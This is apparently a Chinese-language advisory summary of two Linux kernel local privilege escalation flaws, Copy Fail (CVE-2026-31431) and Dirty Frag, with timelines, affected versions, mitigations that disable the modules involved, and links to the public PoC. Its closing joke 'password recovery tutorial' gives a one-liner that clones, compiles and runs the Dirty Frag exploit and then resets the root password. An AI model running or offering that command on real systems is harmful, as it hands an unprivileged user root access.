近期披露的两个 Linux 内核本地提权漏洞 Copy Fail (CVE-2026-31431) 和 Dirty Frag 具有极高的安全影响。两者均利用了内核零拷贝(zero-copy)机制中的逻辑缺陷,允许本地无特权用户获得 root 权限,影响几乎所有主流 Linux 发行版。
1
Copy Fail (CVE-2026-31431)
1.1
基本信息
| |
|---|
| CVE ID | |
| 漏洞名称 | |
| 漏洞类型 | |
| CVSS 评分 | |
| 发现者 | |
| 披露日期 | |
PoC 仓库 ( https://github.com/theori-io/copy-fail-CVE-2026-31431 )
1.2
时间线
| |
|---|
| 2017 | 引入漏洞代码:commit 72548b093ee38a6d (内核 4.14),为 algif_aead.c 添加 AEAD 就地操作优化 |
| 2026-4-22 | 内核安全团队私下修复漏洞,分配 CVE-2026-31431 |
| 2026-4-29 | Theori/Xint 公开披露漏洞详情及 PoC,发布 https://copy.fail |
| 2026-4-30 | OSS-security 邮件列表讨论,Greg KH 等内核维护者回应 |
| 2026-5-6 | Eric Biggers 提交 AF_ALG 弃用标记补丁,提议移除零拷贝支持 |
| 当前 | 各发行版已发布安全更新,AF_ALG 被标记为弃用 |
1.3
影响范围
| |
|---|
| 内核版本 | Linux 4.14 ~ 6.18.22 / 6.19.12 / 7.0 之前的所有版本 |
| 发行版 | Debian, Ubuntu, RHEL/CentOS, Fedora, Arch, SUSE 等几乎所有主流发行版 |
| 前提条件 | 本地用户账户、AF_ALG/algif_aead 模块可用、可读取目标文件 |
| 利用难度 | |
1.4
缓解措施
立即缓解(无需重启):
1echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf2rmmod algif_aead
长期措施:升级内核至已修复版本
2
Dirty Frag
2.1
基本信息
| |
|---|
| CVE ID | |
| 漏洞名称 | |
| 漏洞类型 | |
| 发现者 | |
| 披露日期 | |
| 性质 | 与 Copy Fail 类似的"Universal LPE" |
2.2
时间线
| |
|---|
| 2026-5-7 前 | Hyunwoo Kim 通过协调披露流程发现漏洞,原定 5 月 12 日披露 |
| 2026-5-7 | Steffen Klassert 的修复 commit f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 公开出现在 netdev/net.git |
| 2026-5-7 | Brad Spengler 公开指出该 commit 具有 CopyFail 类漏洞特征 |
| 2026-5-7 | SiCk 基于公开 commit 编写 "Copy Fail 2" PoC 并发布 |
| 2026-5-7 | Hyunwoo Kim 因 embargo 被打破,提前公开 Dirty Frag 详细报告和完整 PoC |
| 2026-5-8 | OSS-security 讨论,Greg KH 等回应 |
| 当前 | |
2.3
技术原理
Dirty Frag 由两个独立漏洞组合而成:
漏洞 1: xfrm ESP-in-UDP MSG_SPLICE_PAGES 无 COW 路径
漏洞 2: rxrpc/rxkad 逻辑缺陷
漏洞 1 提供页缓存写入能力(类似 Copy Fail)
漏洞 2 提供辅助提权路径
2.4
影响范围
| |
|---|
| 内核版本 | 所有支持 ESP-in-UDP 和 rxrpc 的内核版本(广泛) |
| 发行版 | Debian, Ubuntu, RHEL/CentOS, Fedora, Arch, SUSE 等几乎所有主流发行版 |
| 前提条件 | 本地用户账户、esp4/esp6/rxrpc 模块可用 |
| 利用难度 | |
2.5
缓解措施
立即缓解(推荐):
1sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"
注意:禁用这些模块可能影响 VPN/IPSec 功能。
3
结论
Copy Fail 和 Dirty Frag 是近年来最具影响力的 Linux 本地提权漏洞组合。
影响范围几乎所有发行版,Copy Fail 正常披露;Dirty Frag 因上游 commit 公开导致 embargo 提前打破。
不过这两个都是本地提权漏洞,对于本就是 root 用户的个人服务器,这条新闻你就当没看到。
对于忘记 root 密码的人有福了(haha),找回密码教程:
1git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp2# 设置你的新密码3passwd root